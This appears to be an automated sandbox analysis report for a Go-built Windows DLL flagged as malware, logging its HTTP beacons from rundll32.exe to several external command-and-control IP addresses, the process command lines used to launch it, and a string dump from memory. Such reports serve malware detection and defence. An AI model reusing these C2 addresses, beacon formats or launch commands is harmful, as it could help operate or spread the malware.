Aug 9, 2024 19:30:51.693206072 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 7JOwxDih Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:52.289711952 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:52 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49750	77.238.229.63	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:51.822561026 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: tfj4nXhJ Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:52.422346115 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:52 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.4	49751	77.238.250.123	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:52.297672987 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: rckIC1PP Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:52.919675112 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:52 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.4	49752	77.238.250.123	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:30:52.432462931 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: wdTOKsK4 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:30:53.041307926 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:30:52 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.4	49753	195.2.70.38	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:22.960441113 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: iqzDLg5J Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:23.661927938 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
13	192.168.2.4	49754	195.2.70.38	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:23.045965910 CEST	293	OUT	POST / HTTP/1.1 Host: 195.2.70.38 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: QhzyDspD Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:23.778482914 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:23 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
14	192.168.2.4	49755	91.142.74.28	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:23.670452118 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: jc0iQUxH Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:24.374453068 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:24 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
15	192.168.2.4	49756	91.142.74.28	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:23.790730953 CEST	294	OUT	POST / HTTP/1.1 Host: 91.142.74.28 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ps278JPe Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:24.499926090 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:24 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.4	49757	77.238.224.56	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:24.383058071 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: ng2Esf7E Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:25.000452995 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:24 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.4	49758	77.238.224.56	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:24.508050919 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.224.56 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: OBPs4rXv Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:25.115820885 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:25 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.4	49759	77.238.229.63	80	7100	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:25.030198097 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: DDiYiZL9 Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:25.812309980 CEST	165	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:25 GMT Content-Length: 1 Data Raw: 0a Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.4	49760	77.238.229.63	80	7020	C:\Windows\SysWOW64\rundll32.exe

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:25.123140097 CEST	295	OUT	POST / HTTP/1.1 Host: 77.238.229.63 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: xrQPCMBk Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:25.768892050 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:25 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port
20	192.168.2.4	49761	77.238.250.123	80

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:26.591015100 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: 9stAvzmg Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:27.218018055 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:27 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Session ID	Source IP	Source Port	Destination IP	Destination Port
21	192.168.2.4	49762	77.238.250.123	80

Timestamp	Bytes transferred	Direction	Data
Aug 9, 2024 19:31:26.591090918 CEST	296	OUT	POST / HTTP/1.1 Host: 77.238.250.123 User-Agent: Go-http-client/1.1 Content-Length: 158 X-Api-Key: xpzibzYr Accept-Encoding: gzip Data Raw: 18 4d 1b 15 0c 15 2a 0b 4c 5c 4b 0a 53 5d 1d 0f 0f 37 19 04 16 57 06 1e 10 20 1d 54 1e 05 19 4d 42 44 19 15 0c 17 17 33 1a 02 11 01 0f 0b 0c 45 59 4d 0d 14 13 5f 50 01 3c 2c 4b 4b 41 1f 1c 09 11 1e 33 0e 1d 15 1e 08 11 0b 4c 5c 4b 1e 12 16 3d 05 10 53 29 4d 42 44 0b 12 0a 03 0a 30 0c 15 10 06 01 08 4b 5d 41 5f 1f 35 11 49 10 5d 16 55 1a 1e 00 4d 42 44 04 03 56 4d 54 44 51 5f 5a 0d 57 5f 0a 52 51 0e 58 56 0d 03 57 56 5c 54 5e 04 56 0a 5a 5e 5c 06 53 5e 58 50 5e 5e 41 12 Data Ascii: M*L\KS]7W TMBD3EYM_P<,KKA3L\K=S)MBD0K]A_5I]UMBDVMTDQ_ZW_RQXVWV\T^VZ^\S^XP^^A
Aug 9, 2024 19:31:27.217256069 CEST	183	IN	HTTP/1.1 429 Too Many Requests Content-Type: text/plain; charset=utf-8 X-Content-Type-Options: nosniff Date: Fri, 09 Aug 2024 17:31:27 GMT Content-Length: 18 Data Raw: 54 6f 6f 20 6d 61 6e 79 20 72 65 71 75 65 73 74 73 0a Data Ascii: Too many requests

Statistics

Click to jump to process

Memory Usage

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

High Level Behavior Distribution

• File
• Network

Click to dive into process behavior distribution

Behavior

• loaddll32.exe
• conhost.exe
• cmd.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe
• rundll32.exe

Click to jump to process

Target ID:	0
Start time:	13:28:18
Start date:	09/08/2024
Path:	C:\Windows\System32\loaddll32.exe
Wow64 process (32bit):	true
Commandline:	loaddll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll"
Imagebase:	0x140000
File size:	126'464 bytes
MD5 hash:	51E6071F9CBA48E79F10C84515AAE618
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	13:28:18
Start date:	09/08/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	2
Start time:	13:28:18
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	cmd.exe /C rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
Imagebase:	0x240000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	3
Start time:	13:28:18
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,MainFunc
Imagebase:	0x7f0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	13:28:18
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",#1
Imagebase:	0x7f0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	13:28:21
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll,_cgo_dummy_export
Imagebase:	0x7f0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	13:28:32
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",MainFunc
Imagebase:	0x7f0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	13:28:33
Start date:	09/08/2024
Path:	C:\Windows\SysWOW64\rundll32.exe
Wow64 process (32bit):	true
Commandline:	rundll32.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.MalwareX-gen.27138.13961.dll",_cgo_dummy_export
Imagebase:	0x7f0000
File size:	61'440 bytes
MD5 hash:	889B99C52A60DD49227C5E485A016679
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Source: rundll32.exe, 00000003.00000002.3546566789.000000006B46B000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: GoneDATAPING<>1080openStat.com.bat.cmdquitnullbooljson'\''3125Atoiint8uintchanfunccallkind != AhomChamKawiLisuMiaoModiNewaThaiTotoDashermssse3avx2bmi1bmi2bitsNameTypeFrom.css.gif.htm.jpg.mjs.pdf.png.svg.xmlxn--asn1tag:false<nil>ErrorMarchAprilmonthLocal+0530+0430+0545+0630+0330+0845+1030+1245+1345-0930defersweepschedhchansudoggscanmheaptracepanicsleepgcingusagefault[...]hostswriteclosefileshttpsimap2imap3imapspop3s:**@Rangeallowrange:path%s %q%s=%sHTTP/socksFound&"'chdirchmodLstatntohsarray%s:%dyamuxlocal1562578125int16int32int64uint8sliceAdlamBamumBatakBuhidDograGreekKhmerLatinLimbuNushuOghamOriyaOsageRunicTakriTamilSTermsse41sse42ssse3 (at ClassTypeAtls: Earlyparseutf-8%s%dtext/.avif.html.jpeg.json.wasm.webpRealmbad nSHA-1P-224P-256P-384P-521ECDSAupdatekilledconfigStringFormat[]bytestringSundayMondayFridayAugustminutesecondUTC-11UTC-02UTC-08UTC-09UTC+12UTC+13sysmontimersefenceselect, not objectstatusnetdns.locallisten.onionip+netreturnsocketacceptdomaingophertelnetClosedBasic CookiecookieexpectoriginserverclosedExpectPragmasocks LockedCANCELGOAWAYPADDEDactivesocks5renameexec: hangupGetACPsendtoremote390625uint16uint32uint64structchan<-<-chan 